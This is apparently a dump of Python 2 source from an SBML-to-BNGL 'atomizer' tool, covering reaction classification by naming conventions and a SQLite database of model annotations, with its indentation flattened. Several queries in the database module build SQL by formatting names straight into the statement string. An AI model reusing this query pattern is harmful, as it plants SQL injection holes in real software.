def getReactionProperties(self):
'''
if we are using a naming convention definition in the json file
this method will return the component and state names that this
reaction uses
'''
#TODO: once we transition completely to a naming convention delete
#this ----
reactionTypeProperties = {}
reactionDefinition = self.loadConfigFiles(self.configurationFile)
if self.speciesEquivalences != None:
self.userEquivalences = self.loadConfigFiles(self.speciesEquivalences)['reactionDefinition']
for reactionType,properties in zip(reactionDefinition['reactionsNames'],reactionDefinition['definitions']):
            # if it's a reaction defined by its naming convention
for alternative in properties:
if 'n' in alternative.keys():
try:
site = reactionDefinition['reactionSite'][alternative['rsi']]
state = reactionDefinition['reactionState'][alternative['rst']]
except:
site = reactionType
state = reactionType[0]
reactionTypeProperties[reactionType] = [site,state]
#TODO: end of delete
reactionDefinition = self.namingConventions
for idx,reactionType in enumerate(reactionDefinition['modificationList']):
site = reactionDefinition['reactionSite'][reactionDefinition['definitions'][idx]['rsi']]
state = reactionDefinition['reactionState'][reactionDefinition['definitions'][idx]['rst']]
reactionTypeProperties[reactionType] = [site,state]
return reactionTypeProperties
def processFuzzyReaction(self,reaction,translationKeys,conventionDict,indirectEquivalenceTranslator):
differences,pairedChemicals= self.approximateMatching(reaction,
translationKeys)
#matching,matching2 = self.approximateMatching2(reaction,strippedMolecules,
# translationKeys)
d1,d2 = differences[0],differences[1]
firstMatch,secondMatch = pairedChemicals[0],pairedChemicals[1]
matches = [firstMatch,secondMatch]
for index,element in enumerate([d1,d2]):
idx1=0
idx2 = 1
while idx2 <= len(element):
if (element[idx1],) in conventionDict.keys():
pattern = conventionDict[(element[idx1],)]
indirectEquivalenceTranslator[pattern].append([[reaction[0][index],reaction[1][0]],reaction[0],matches[index],reaction[1]])
elif (element[idx1].replace('-','+'),) in conventionDict.keys():
matches[index].reverse()
transformedPattern = conventionDict[(element[idx1].replace('-','+'),) ]
indirectEquivalenceTranslator[transformedPattern].append([[reaction[1][0],reaction[0][index]],reaction[0],matches[index],reaction[1]])
elif idx2 < len(element):
if tuple([element[idx1],element[idx2]]) in conventionDict.keys():
pattern = conventionDict[tuple([element[idx1],element[idx2]])]
indirectEquivalenceTranslator[pattern].append([[reaction[0][index],reaction[1][0]],reaction[0],matches[index],reaction[1]])
idx1 += 1
idx2 += 1
elif '-' in element[idx1] and '-' in element[idx2]:
if tuple([element[idx1].replace('-','+'),element[idx2].replace('-','+')]) in conventionDict.keys():
matches[index].reverse()
transformedPattern = conventionDict[tuple([element[idx1].replace('-','+'),element[idx2].replace('-','+')])]
indirectEquivalenceTranslator[transformedPattern].append([[reaction[1][0],reaction[0][index]],reaction[0],matches[index],reaction[1]])
idx1 += 1
idx2 += 1
idx1+=1
idx2+=1
def removeExactMatches(self, reactantList, productList):
"""
goes through the list of lists reactantList and productList and removes the intersection
"""
reactantFlat = Counter([y for x in reactantList for y in x])
productFlat = Counter([y for x in productList for y in x])
intersection = reactantFlat & productFlat
intersection2 = deepcopy(intersection)
newReactant = []
newProduct = []
for chemical in reactantList:
tmp = []
for element in chemical:
if intersection[element] > 0:
intersection[element] -= 1
else:
tmp.append(element)
newReactant.append(tmp)
for chemical in productList:
tmp = []
for element in chemical:
if intersection2[element] > 0:
intersection2[element] -= 1
else:
tmp.append(element)
newProduct.append(tmp)
return newReactant,newProduct
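    # Hedged worked example (added, with made-up inputs): for
    #   reactantList = [['A', 'P'], ['B']]
    #   productList  = [['A_P'], ['B']]
    # the multiset intersection of both sides is {'B': 1}, so 'B' is removed
    # from each side and the method returns
    #   ([['A', 'P'], []], [['A_P'], []])
    # leaving only the chemicals that actually change across the reaction.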
def findBiggestActionable(self,chemicalList, chemicalCandidatesList):
actionableList = []
for chemical,chemicalCandidates in zip(chemicalList,chemicalCandidatesList):
if len(chemicalCandidates) == 0:
return None
if len(chemicalCandidates) == 1:
actionableList.append([chemical])
continue
# find all combinations
scoreDict = []
result = 0
try:
for i in xrange(1, len(chemicalCandidates)+1):
combinations = list(itertools.permutations(chemicalCandidates,i))
for x in combinations:
score = difflib.SequenceMatcher(None,'_'.join(x), chemical).quick_ratio()
if score == 1:
result = x
raise IOError
elif score > 0:
scoreDict.append([x, score])
except IOError:
scoreDict = [[result,1.0]]
scoreDict.sort(key=lambda x:[x[1],-len(x[0])], reverse=True)
if len(scoreDict) > 0:
actionableList.append(list(scoreDict[0][0]))
else:
print actionableList
raise Exception
return actionableList
def breakByActionableUnit(self, reaction, strippedMolecules):
#find valid actionable units from the list of molecules in the system
validCandidatesReactants = [[y for y in strippedMolecules if y in x] for x in reaction[0]]
validCandidatesProducts = [[y for y in strippedMolecules if y in x] for x in reaction[1]]
# find the subset of intersection parts between reactants and products
intermediateVector = [list(itertools.ifilter(lambda x: any([len([z for z in difflib.ndiff(x,y) if '+' in z[0] or '-' in z[0]]) <= 3 for z in validCandidatesProducts for y in z]), sublist)) for sublist in validCandidatesReactants]
intermediateVector = [list(itertools.ifilter(lambda x: any([len([z for z in difflib.ndiff(x,y) if '+' in z[0] or '-' in z[0]]) <= 3 for z in intermediateVector for y in z]), sublist)) for sublist in validCandidatesProducts]
tmpReactant = [[list(itertools.ifilter(lambda y:len([x for x in intermediateVector[0] if y in x]) == 1, reactant))] for reactant in validCandidatesReactants]
tmpProduct = [[list(itertools.ifilter(lambda y:len([x for x in intermediateVector[0] if y in x]) == 1, reactant))] for reactant in validCandidatesProducts]
#print validCandidatesReactants,validCandidatesProducts,intermediateVector
#print '......',reaction
#print '\t......',validCandidatesReactants,validCandidatesProducts
#find biggest subset of actionable units
reactantList = self.findBiggestActionable(reaction[0],validCandidatesReactants)
productList = self.findBiggestActionable(reaction[1],validCandidatesProducts)
#print '\t\t+++++',reactantList,productList
return reactantList,productList
def testAgainstExistingConventions(self, fuzzyKey, modificationList, threshold=4):
@memoize
def testAgainstExistingConventionsHelper(fuzzyKey, modificationList, threshold):
if not fuzzyKey:
return None
for i in xrange(1, threshold):
combinations = itertools.permutations(modificationList, i)
validKeys = list(itertools.ifilter(lambda x: (''.join(x)).upper() == fuzzyKey.upper(), combinations))
if (validKeys):
return validKeys
return None
return testAgainstExistingConventionsHelper(fuzzyKey, modificationList, threshold)
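    # Hedged worked example (added, with made-up inputs): for
    #   fuzzyKey = '_gdp_p', modificationList = ['_p', '_gdp']
    # the permutation ('_gdp', '_p') joins to '_gdp_p' (compared
    # case-insensitively), so the call returns [('_gdp', '_p')]; if no
    # permutation of up to threshold-1 known modifications reproduces the
    # key, None is returned.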
def classifyReactions(self, reactions, molecules, externalDependencyGraph={}):
'''
        classifies a group of reactions according to the information in the json
        config file
        FIXME: classifyReactions is currently the biggest bottleneck in atomizer, taking up
to 80% of the time without counting pathwaycommons querying.
'''
def createArtificialNamingConvention(reaction, fuzzyKey, fuzzyDifference):
'''
Does the actual data-structure filling if
a 1-1 reaction shows sign of modification. Returns True if
a change was performed
'''
#fuzzyKey,fuzzyDifference = self.processAdHocNamingConventions(reaction[0][0],reaction[1][0],localSpeciesDict,compartmentChangeFlag)
if fuzzyKey and fuzzyKey.strip('_').lower() not in [x.lower() for x in strippedMolecules]:
                # if our state isn't yet in the dependency graph's preliminary data structures
if '{0}'.format(fuzzyKey) not in equivalenceTranslator:
# print '---','{0}'.format(fuzzyKey),equivalenceTranslator.keys()
                    # check if there is a combination of existing keys that deals with this modification without the need of creating a new one
if self.testAgainstExistingConventions(fuzzyKey,self.namingConventions['modificationList']):
logMess('INFO:LAE005', 'added relationship through existing convention in reaction {0}'.format(str(reaction)))
if '{0}'.format(fuzzyKey) not in equivalenceTranslator:
equivalenceTranslator['{0}'.format(fuzzyKey)] = []
if '{0}'.format(fuzzyKey) not in indirectEquivalenceTranslator:
indirectEquivalenceTranslator['{0}'.format(fuzzyKey)] = []
if tuple(sorted([x[0] for x in reaction],key=len)) not in equivalenceTranslator['{0}'.format(fuzzyKey)]:
equivalenceTranslator['{0}'.format(fuzzyKey)].append(tuple(sorted([x[0] for x in reaction],key=len)))
return
logMess('INFO:LAE004', '{0}:{1}:added induced naming convention'.format(reaction[0][0],reaction[1][0]))
equivalenceTranslator['{0}'.format(fuzzyKey)] = []
if fuzzyKey == '0':
tmpState = 'ON'
else:
tmpState = fuzzyKey.upper()
adhocLabelDictionary['{0}'.format(fuzzyKey)] = ['{0}'.format(fuzzyKey),tmpState]
#fill main naming convention data structure
self.namingConventions['modificationList'].append('{0}'.format(fuzzyKey))
self.namingConventions['reactionState'].append(tmpState)
self.namingConventions['reactionSite'].append('{0}'.format(fuzzyKey))
self.namingConventions['patterns'][fuzzyDifference] = '{0}'.format(fuzzyKey)
self.namingConventions['definitions'].append({'rst':len(self.namingConventions['reactionState'])-1,
'rsi':len(self.namingConventions['reactionSite'])-1})
if fuzzyKey not in translationKeys:
translationKeys.append(fuzzyKey)
            # if this same definition doesn't already exist; this is to avoid cycles
if tuple(sorted([x[0] for x in reaction],key=len)) not in equivalenceTranslator['{0}'.format(fuzzyKey)]:
equivalenceTranslator['{0}'.format(fuzzyKey)].append(tuple(sorted([x[0] for x in reaction],key=len)))
newTranslationKeys.append(fuzzyKey)
conventionDict[fuzzyDifference] = '{0}'.format(fuzzyKey)
if '{0}'.format(fuzzyKey) not in indirectEquivalenceTranslator:
indirectEquivalenceTranslator['{0}'.format(fuzzyKey)] = []
return True
return False
# load the json config file
reactionDefinition = self.loadConfigFiles(self.configurationFile)
rawReactions = []
for x in reactions:
tmp = parseReactions(x)
if tmp:
rawReactions.append(tmp)
#rawReactions = [parseReactions(x) for x in reactions if parseReactions(x)]
strippedMolecules = [x.strip('()') for x in molecules]
reactionnetworkelements = set([z for x in rawReactions for y in x for z in y])
        # only keep those molecules that appear in the reaction network
strippedMolecules = [x for x in strippedMolecules if x in reactionnetworkelements]
# load user defined complexes
if self.speciesEquivalences != None:
self.userEquivalences = self.loadConfigFiles(self.speciesEquivalences)['reactionDefinition']
# determines if two molecules have a relationship according to the naming convention section
#equivalenceTranslator is a dictionary of actual modifications
#example {'Phosporylation':[['A','A_p'],['B','B_p']]}
#process straightforward naming conventions
        # XXX: we should take this function out of processNamingConventions2 and every process that calls it
tmpTranslator,translationKeys,conventionDict = detectOntology.analyzeNamingConventions(strippedMolecules,
self.userNamingConventions,similarityThreshold=10)
userEquivalenceTranslator, _, _ = self.processNamingConventions2(strippedMolecules,onlyUser=True)
for element in tmpTranslator:
if element in userEquivalenceTranslator:
userEquivalenceTranslator[element].extend(tmpTranslator[element])
else:
userEquivalenceTranslator[element] = tmpTranslator[element]
equivalenceTranslator = copy(userEquivalenceTranslator)
newTranslationKeys = []
adhocLabelDictionary = {}
# lists of plain reactions
# process fuzzy naming conventions based on reaction information
indirectEquivalenceTranslator = {x: [] for x in equivalenceTranslator}
localSpeciesDict = defaultdict(lambda: defaultdict(list))
trueBindingReactions = []
        # the lexical dependencyGraph merely applies lexical analysis to detect which components in the left hand side
        # match to different ones in the right hand side of a given reaction
lexicalDependencyGraph = defaultdict(list)
strippedMolecules = [x.strip('()') for x in molecules]
        # only keep those molecules that appear in the reaction network
strippedMolecules = [x for x in strippedMolecules if x in reactionnetworkelements]
for idx,reaction in enumerate(rawReactions):
flagstar = False
if len(reaction[0]) == 1 and len(reaction[1]) == 1 \
and len(reaction[0][0]) > len(reaction[1][0]):
                # unmodification/relaxation
flagstar = True
reaction = [reaction[1], reaction[0]]
#should we reuse information obtained from other methods?
#FIXME: instead of doing a simple split by '_' we should be comparing against the molecules in stripped molecules and split by smallest actionable units.
if externalDependencyGraph == {}:
#print '-----',reaction
#reactantString, productString = self.breakByActionableUnit(reaction, strippedMolecules)
#print '...',reaction, reactantString, productString
#if not reactantString or not productString:
reactantString = [x.split('_') for x in reaction[0]]
reactantString = [[y for y in x if y!=''] for x in reactantString]
productString = [x.split('_') for x in reaction[1]]
productString = [[y for y in x if y!=''] for x in productString]
else:
reactantString = []
productString = []
#check how the reactants are composed and add it to the list
for element in reaction[0]:
if element not in externalDependencyGraph or externalDependencyGraph[element] == []:
reactantString.append([element])
else:
reactantString.append(deepcopy(externalDependencyGraph[element][0]))
#same for products
for element in reaction[1]:
if element not in externalDependencyGraph or externalDependencyGraph[element] == []:
productString.append([element])
else:
productString.append(deepcopy(externalDependencyGraph[element][0]))
# remove those chemicals that match exactly on both sides since those are not interesting.
# and unlike lexical pattern matching we are not going to go around trying to increase string size
reactantString, productString = self.removeExactMatches(reactantString, productString)
if [0] in reactantString or [0] in productString:
continue
matching, matching2 = self.approximateMatching2(reactantString, productString, strippedMolecules, translationKeys)
#print reaction, matching
#if matching and flagstar:
# logMess('DEBUG:Atomization', 'inverting order of {0} for lexical analysis'.format([reaction[1], reaction[0]]))
flag = True
if matching:
for reactant,matches in zip(reaction[1],matching):
for match in matches:
pair = list(match)
pair.sort(key=len)
fuzzyList = self.processAdHocNamingConventions(pair[0],
pair[1],localSpeciesDict,False,strippedMolecules)
for fuzzyReaction,fuzzyKey,fuzzyDifference in fuzzyList:
if fuzzyKey == None and fuzzyReaction[0] != fuzzyReaction[1]:
flag= False
                                #logMess('Warning:ATOMIZATION','We could not find a meaningful \
                                #mapping in {0} when lexically analyzing {1}.'.format(pair,reactant))
createArtificialNamingConvention(fuzzyReaction,
fuzzyKey, fuzzyDifference)
if flag and sorted([x[1] for x in matches]) not in lexicalDependencyGraph[reactant]:
# dont introduce cyclical dependencies
if all([x[1] != reactant for x in matches]):
lexicalDependencyGraph[reactant].append(sorted([x[1] for x in matches]))
for x in matches:
# TODO(Oct14): it would be better to try to map this to an
# existing molecule instead of trying to create a new one
if x[1] not in strippedMolecules:
if len(x[1]) > len(x[0]):
lexicalDependencyGraph[x[1]] = [[x[0]]]
else:
lexicalDependencyGraph[x[0]] = [[x[1]]]
lexicalDependencyGraph[x[1]] = []
translationKeys.extend(newTranslationKeys)
for species in localSpeciesDict:
speciesName = localSpeciesDict[species][localSpeciesDict[species].keys()[0]][0][0]
definition = [species]
sdefinition = [speciesName]
for component in localSpeciesDict[species]:
cdefinition = []
states = [["s",state[1]] for state in
localSpeciesDict[species][component]]
for state in states:
cdefinition.extend(state)
cdefinition = [component,cdefinition]
sdefinition.extend(cdefinition)
definition.append([sdefinition])
self.lexicalSpecies.append(definition)
#definition = [commonRoot,[[commonRoot,componentName,["s",tag]]]]
reactionClassification = self.getReactionClassification(reactionDefinition,
rawReactions,equivalenceTranslator,
indirectEquivalenceTranslator,
translationKeys)
for element in trueBindingReactions:
reactionClassification[element] = 'Binding'
listOfEquivalences = []
for element in equivalenceTranslator:
listOfEquivalences.extend(equivalenceTranslator[element])
return reactionClassification,listOfEquivalences,equivalenceTranslator, \
indirectEquivalenceTranslator,adhocLabelDictionary,lexicalDependencyGraph, \
userEquivalenceTranslator
def processAnnotations(self,molecules,annotations):
processedAnnotations = []
for element in annotations:
if len(annotations[element]) > 1:
pro = [list(x) for x in itertools.combinations([y for y in annotations[element]],2)]
processedAnnotations.extend(pro)
return {-1:processedAnnotations}
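    # Hedged worked example (added, with made-up inputs): for
    #   annotations = {'A': ['uniprot:P1', 'go:G1', 'chebi:C1']}
    # every unordered pair of annotations is generated, so the method returns
    #   {-1: [['uniprot:P1', 'go:G1'], ['uniprot:P1', 'chebi:C1'],
    #         ['go:G1', 'chebi:C1']]}
    # entries with a single annotation contribute nothing.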
def classifyReactionsWithAnnotations(self,reactions,molecules,annotations,labelDictionary):
'''
        this method will go through the list of reactions and assign a 'modification' tag to those reactions where
        some kind of modification goes on, aided by annotation information
'''
rawReactions = [parseReactions(x) for x in reactions]
equivalenceTranslator = self.processAnnotations(molecules,annotations)
for reactionIndex in range(0,len(rawReactions)):
for reactantIndex in range(0,len(rawReactions[reactionIndex])):
tmp = []
for chemicalIndex in range(0,len(rawReactions[reactionIndex][reactantIndex])):
tmp.extend(list(labelDictionary[rawReactions[reactionIndex][reactantIndex][chemicalIndex]]))
rawReactions[reactionIndex][reactantIndex] = tmp
#self.annotationClassificationHelper(rawReactions,equivalenceTranslator[-1])
def userJsonToDataStructure(self, patternName, userEquivalence, dictionary,
labelDictionary, equivalencesList):
'''
converts a user defined species to an internal representation
'''
tmp = st.Species()
label = []
for molecule in userEquivalence[1]:
if molecule[0] == 0:
labelDictionary[patternName] = 0
return
tmp2 = st.Molecule(molecule[0])
for componentIdx in range(1, len(molecule), 2):
tmp3 = st.Component(molecule[componentIdx])
for bindStateIdx in range(0, len(molecule[componentIdx + 1]), 2):
if molecule[componentIdx + 1][bindStateIdx] == "b":
tmp3.addBond(molecule[componentIdx + 1][bindStateIdx + 1])
elif molecule[componentIdx + 1][bindStateIdx] == "s":
tmp3.addState('0')
tmp3.addState(molecule[componentIdx + 1][bindStateIdx + 1])
equivalencesList.append([patternName, molecule[0]])
#tmp3.addState(molecule[2][2])
tmp2.addComponent(tmp3)
stmp = st.Species()
stmp.addMolecule(deepcopy(tmp2))
stmp.reset()
# in case one definition overlaps another
if molecule[0] in dictionary:
dictionary[molecule[0]].extend(deepcopy(stmp))
else:
dictionary[molecule[0]] = deepcopy(stmp)
labelDictionary[molecule[0]] = [(molecule[0],)]
label.append(molecule[0])
#for component in tmp2.components:
# if component.name == molecule[1]:
# component.setActiveState(molecule[2][1])
tmp.addMolecule(tmp2)
if patternName in dictionary:
dictionary[patternName].extend(deepcopy(tmp))
else:
dictionary[patternName] = deepcopy(tmp)
labelDictionary[patternName] = [tuple(label)]
def getUserDefinedComplexes(self):
dictionary = {}
partialDictionary = {}
userLabelDictionary = {}
equivalencesList = []
lexicalLabelDictionary = {}
if self.speciesEquivalences is not None:
speciesdictionary = self.loadConfigFiles(self.speciesEquivalences)
userEquivalences = speciesdictionary['complexDefinition'] \
if 'complexDefinition' in speciesdictionary else None
for element in userEquivalences:
self.userJsonToDataStructure(element[0], element, dictionary,
userLabelDictionary, equivalencesList)
complexEquivalences = speciesdictionary['modificationDefinition']
for element in complexEquivalences:
userLabelDictionary[element] = [tuple(complexEquivalences[element])]
partialUserEquivalences = speciesdictionary['partialComplexDefinition'] \
if 'partialComplexDefinition' in speciesdictionary else []
for element in partialUserEquivalences:
self.userJsonToDataStructure(tuple(sorted(element[0])), element, partialDictionary,
{}, [])
#stuff we got from string similarity
for element in self.lexicalSpecies:
self.userJsonToDataStructure(element[0], element, dictionary, lexicalLabelDictionary,
equivalencesList)
return dictionary, userLabelDictionary, lexicalLabelDictionary, partialDictionary
```
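The `processAnnotations` method above collapses shared annotations into pairwise species equivalences. A minimal sketch of that behavior, using a hypothetical annotation map (the URIs and species names are illustrative only):
```python
import itertools

# Hypothetical input: annotation URI -> species names sharing that annotation.
annotations = {'uniprot/P00533': ['EGFR', 'egfr_m'], 'uniprot/P01133': ['EGF']}

processed = []
for uri in annotations:
    if len(annotations[uri]) > 1:
        # every pair of names sharing an annotation becomes a candidate equivalence
        processed.extend([list(x) for x in itertools.combinations(annotations[uri], 2)])

print({-1: processed})  # {-1: [['EGFR', 'egfr_m']]}
```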
#### File: SBMLparser/merging/namingDatabase.py
```python
import sqlite3
import utils.annotationExtractor
import utils.annotationResolver
import argparse
import os
from copy import copy
import pprint
import fnmatch
import progressbar
import enum
import utils.readBNGXML
Query = enum.Enum('Query', 'all organism species family')
organismFamilies = {'mammals': ['Homo sapiens', 'Mammalia', 'Mus musculus', 'Rattus norvegicus', 'Rattus rattus']}
def getFiles(directory, extension):
"""
Gets a list of <*.extension> files. Includes subdirectories and returns the absolute
paths. Also sorts the result by file size.
"""
matches = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, '*.{0}'.format(extension)):
matches.append([os.path.join(root, filename), os.path.getsize(os.path.join(root, filename))])
# sort by size
matches.sort(key=lambda filename: filename[1], reverse=False)
matches = [x[0] for x in matches]
return matches
class NamingDatabase:
def __init__(self, databaseName):
self.databaseName = databaseName
def getAnnotationsFromSpecies(self, speciesName):
connection = sqlite3.connect(self.databaseName)
cursor = connection.cursor()
queryStatement = 'SELECT annotationURI,annotationName from moleculeNames as M join identifier as I ON M.ROWID == I.speciesID join annotation as A on A.ROWID == I.annotationID and M.name == "{0}"'.format(speciesName)
queryResult = [x[0] for x in cursor.execute(queryStatement)]
connection.close()
return queryResult
def getFileNameFromSpecies(self, speciesName):
"""
species name refers to a molecular species
"""
connection = sqlite3.connect(self.databaseName)
cursor = connection.cursor()
queryStatement = 'SELECT B.file,M.name from moleculeNames as M join biomodels as B on B.ROWID == M.fileID WHERE M.name == "{0}"'.format(speciesName)
queryResult = [x[0] for x in cursor.execute(queryStatement)]
connection.close()
return queryResult
def getFileNameFromOrganism(self, organismName):
"""
returns the names of the model files annotated with organism <organismName>
"""
connection = sqlite3.connect(self.databaseName)
cursor = connection.cursor()
queryStatement = 'SELECT B.file,A.annotationName from biomodels as B join annotation as A on B.organismID == A.ROWID WHERE A.annotationName == "{0}"'.format(organismName)
queryResult = [x[0] for x in cursor.execute(queryStatement)]
connection.close()
return queryResult
def getOrganismNames(self):
connection = sqlite3.connect(self.databaseName)
cursor = connection.cursor()
queryStatement = 'SELECT DISTINCT A.annotationName from biomodels as B join annotation as A on B.organismID == A.ROWID'
queryResult = [x[0] for x in cursor.execute(queryStatement)]
connection.close()
return queryResult
def getSpeciesFromAnnotations(self, annotation):
connection = sqlite3.connect(self.databaseName)
cursor = connection.cursor()
queryStatement = 'SELECT name,A.annotationURI from moleculeNames as M join identifier as I ON M.ROWID == I.speciesID join annotation as A on A.ROWID == I.annotationID and A.annotationURI == "{0}"'.format(annotation)
queryResult = [x[0] for x in cursor.execute(queryStatement)]
connection.close()
return queryResult
def getFilesInDatabase(self):
connection = sqlite3.connect(self.databaseName)
cursor = connection.cursor()
queryStatement = 'SELECT file from biomodels'
queryResult = [x[0] for x in cursor.execute(queryStatement)]
connection.close()
return queryResult
def getSpeciesFromFileName(self, fileName):
connection = sqlite3.connect(self.databaseName)
cursor = connection.cursor()
queryStatement = 'SELECT B.file,name,A.annotationURI,A.annotationName,qualifier from moleculeNames as M join identifier as I ON M.ROWID == I.speciesID \
join annotation as A on A.ROWID == I.annotationID join biomodels as B on B.ROWID == M.fileID and B.file == "{0}"'.format(fileName)
#I.qualifier != "BQB_HAS_PART" and \
#I.qualifier != "BQB_HAS_VERSION" AND I.qualifier != "BQB_HAS_PROPERTY"'.format(fileName)
speciesList = [x[1:] for x in cursor.execute(queryStatement)]
tmp = {x[0]: set([]) for x in speciesList}
tmp2 = {x[0]: set([]) for x in speciesList}
tmp3 = {x[0]: set([]) for x in speciesList}
tmp4 = {x[0]: set([]) for x in speciesList}
for x in speciesList:
if x[3] in ["BQB_IS", "BQM_IS", "BQB_IS_VERSION_OF"]:
tmp[x[0]].add(x[1])
if x[2] != '':
tmp2[x[0]].add(x[2])
tmp3[x[0]].add(x[3])
else:
tmp4[x[0]].add((x[1], x[3]))
tmp = [{'name': set([x]), 'annotation': set(tmp[x]), 'annotationName': set(tmp2[x]), 'fileName': set([fileName]), 'qualifier': tmp3[x], 'otherAnnotation':[tmp4[x]] if tmp4[x] else []} for x in tmp]
return tmp
def findOverlappingNamespace(self, fileList):
fileSpecies = []
if len(fileList) == 0:
fileList = self.getFilesInDatabase()
progress = progressbar.ProgressBar(maxval=len(fileList)).start()
for idx in progress(range(len(fileList))):
fileSpecies.extend(self.getSpeciesFromFileName(fileList[idx]))
changeFlag = True
fileSpeciesCopy = copy(fileSpecies)
print 'finished processing files, obtained {0} groups'.format(len(fileSpecies))
#progress = progressbar.ProgressBar(maxval=len((fileSpecies - 1) * (fileSpecies -1))).start()
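# Merge annotation groups until a fixed point: raising IOError below is an
# intentional (if unusual) control-flow trick that restarts the pairwise scan
# from the top after every successful merge.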
while changeFlag:
try:
changeFlag = False
for idx in range(0, len(fileSpecies) - 1):
for idx2 in range(idx+1, len(fileSpecies)):
#if (len(fileSpecies[idx]['name']) > 2 and fileSpecies[idx]['name'].intersection(fileSpecies[idx2]['name'])) \
if fileSpecies[idx]['annotation'].intersection(fileSpecies[idx2]['annotation']) \
or fileSpecies[idx]['annotationName'].intersection(fileSpecies[idx2]['annotationName']):
#print 'hello',fileSpecies[idx]['annotationName'],fileSpecies[idx2]['annotationName']
fileSpeciesCopy[idx]['name'] = fileSpeciesCopy[idx]['name'].union(fileSpeciesCopy[idx2]['name'])
fileSpeciesCopy[idx]['annotation'] = fileSpeciesCopy[idx]['annotation'].union(fileSpeciesCopy[idx2]['annotation'])
fileSpeciesCopy[idx]['annotationName'] = fileSpeciesCopy[idx]['annotationName'].union(fileSpeciesCopy[idx2]['annotationName'])
fileSpeciesCopy[idx]['fileName'] = fileSpeciesCopy[idx]['fileName'].union(fileSpeciesCopy[idx2]['fileName'])
fileSpeciesCopy[idx]['qualifier'] = fileSpeciesCopy[idx]['qualifier'].union(fileSpeciesCopy[idx2]['qualifier'])
fileSpeciesCopy[idx]['otherAnnotation'].extend(fileSpeciesCopy[idx2]['otherAnnotation'])
del fileSpeciesCopy[idx2]
fileSpecies = fileSpeciesCopy
raise IOError
except IOError:
changeFlag = True
continue
#fileSpecies = [[x['name'], len(x['fileName'])] for x in fileSpecies]
fileSpecies.sort(key=lambda x: len(x['fileName']), reverse=True)
#import pickle
#with open('results.dump','wb') as f:
# pickle.dump(fileSpecies,f)
return fileSpecies
def isFileInDatabase(self, fileName):
return isFileInDatabase(self.databaseName, fileName)
def isFileInDatabase(databaseName, fileName):
connection = sqlite3.connect(databaseName)
cursor = connection.cursor()
queryStatement = 'select file from biomodels WHERE file == "{0}"'.format(fileName)
matchingFileNames = [x[0] for x in cursor.execute(queryStatement)]
connection.close()
return len(matchingFileNames) > 0
def setupDatabase(databaseName):
connection = sqlite3.connect(databaseName)
cursor = connection.cursor()
cursor.execute('''CREATE TABLE biomodels(file UNIQUE, organismID INT, FOREIGN KEY(organismID) REFERENCES annotation(ROWID))''')
cursor.execute('''CREATE TABLE moleculeNames(fileId INT,name, FOREIGN KEY(fileID) REFERENCES biomodels(file))''')
cursor.execute('''CREATE TABLE annotation(annotationURI UNIQUE ON CONFLICT IGNORE,annotationName)''')
cursor.execute('''CREATE TABLE identifier(annotationID INT, qualifier, speciesID INT, FOREIGN KEY(speciesID) \
REFERENCES moleculeName(ROWID), FOREIGN KEY(annotationID) references annotation(ROWID))''')
cursor.execute('''CREATE TABLE bond(fileName INT, moleculeID1 INT, moleculeID2 INT, FOREIGN KEY(fileName) REFERENCES biomodels(ROWID), \
FOREIGN KEY(moleculeID1) REFERENCES moleculeNames(ROWID), FOREIGN KEY(moleculeID2) REFERENCES moleculeNames(ROWID))''')
connection.commit()
connection.close()
def extractBasicAnnotations(fileName, userDefinitions=None):
annotations = utils.annotationExtractor.AnnotationExtractor(fileName, userDefinitions)
elementalMolecules = [x for x in annotations.sct if annotations.sct[x] == []]
speciesAnnotations = {x: annotations.getAnnotationSystem()[x] for x in elementalMolecules}
modelAnnotations = annotations.getModelAnnotations()
return speciesAnnotations, modelAnnotations
def populateDatabaseFromFile(fileName, databaseName, userDefinitions=None):
"""
Insert annotations from file <fileName>
"""
fileName2 = fileName.split(os.sep)[-1]
if isFileInDatabase(databaseName, fileName2):
print('Database already contains annotation from file {0}'.format(fileName2))
return -1
connection = sqlite3.connect(databaseName)
cursor = connection.cursor()
basicModelAnnotations, generalModelAnnotations = extractBasicAnnotations(fileName, userDefinitions)
moleculeNames = []
annotationNames = []
moleculeAnnotations = []
modelSpecies = ''
# insert model description
for annotation in generalModelAnnotations:
if 'taxonomy' in annotation[1]:
modelSpecies = annotation
break
annotationNames.append(utils.annotationResolver.resolveAnnotation(annotation[1]))
cursor.executemany("INSERT into annotation(annotationURI,annotationName) values (?, ?)", annotationNames)
connection.commit()
annotationID = [x for x in cursor.execute('select ROWID from annotation WHERE annotationURI == "{0}"'.format(annotationNames[-1][0]))][0][0]
annotationNames = []
cursor.executemany("INSERT into biomodels(file,organismID) values (?,?)", [[fileName2, annotationID]])
connection.commit()
modelID = [x for x in cursor.execute('select ROWID from biomodels WHERE file == "{0}"'.format(fileName2))][0][0]
# insert moleculeNames
for molecule in basicModelAnnotations:
moleculeNames.append([modelID, molecule])
annotationIDs = {x[1]: x[0] for x in cursor.execute("select ROWID,annotationURI from annotation")}
# insert annotations
for molecule in basicModelAnnotations:
for annotationType in basicModelAnnotations[molecule]:
for annotation in basicModelAnnotations[molecule][annotationType]:
if annotation not in annotationIDs:
annotationName = utils.annotationResolver.resolveAnnotation(annotation)
annotationNames.append([annotation, annotationName[1]])
cursor.executemany("INSERT into annotation(annotationURI,annotationName) values (?, ?)", annotationNames)
connection.commit()
cursor.executemany("INSERT into moleculeNames(fileId,name) values (?, ?)", moleculeNames)
connection.commit()
moleculeIDs = {x[1]: x[0] for x in cursor.execute("select ROWID,name from moleculeNames WHERE moleculeNames.fileId == '{0}'".format(modelID))}
annotationIDs = {x[1]: x[0] for x in cursor.execute("select ROWID,annotationURI from annotation")}
for molecule in basicModelAnnotations:
for annotationType in basicModelAnnotations[molecule]:
for annotation in basicModelAnnotations[molecule][annotationType]:
moleculeAnnotations.append([annotationIDs[annotation], moleculeIDs[molecule], annotationType])
cursor.executemany("insert into identifier(annotationID,speciesID, qualifier) values (?, ?, ?)", moleculeAnnotations)
connection.commit()
connection.close()
def populateBondDatabaseFromFile(fileName, databaseName):
pass
def defineConsole():
parser = argparse.ArgumentParser(description='SBML to BNGL translator')
parser.add_argument('-c', '--create', action='store_true', help='Create database tables')
parser.add_argument('-d', '--database', type=str, help='database to modify', required=True)
parser.add_argument('-i', '--input-file', type=str, help='input SBML file')
parser.add_argument('-u', '--user_conventions', type=str, help='Use user convention definitions for SCT calculation')
parser.add_argument('-q', '--query', type=str, help='Query a database for its common namespace')
parser.add_argument('-s', '--specific_query', type=str, help='search for models with a given molecule')
parser.add_argument('-r', '--directory', type=str, help='Add SBML models in directory "directory" to database')
#parser.add_argument('-o','--output-file',type=str,help='output SBML file',required=True)
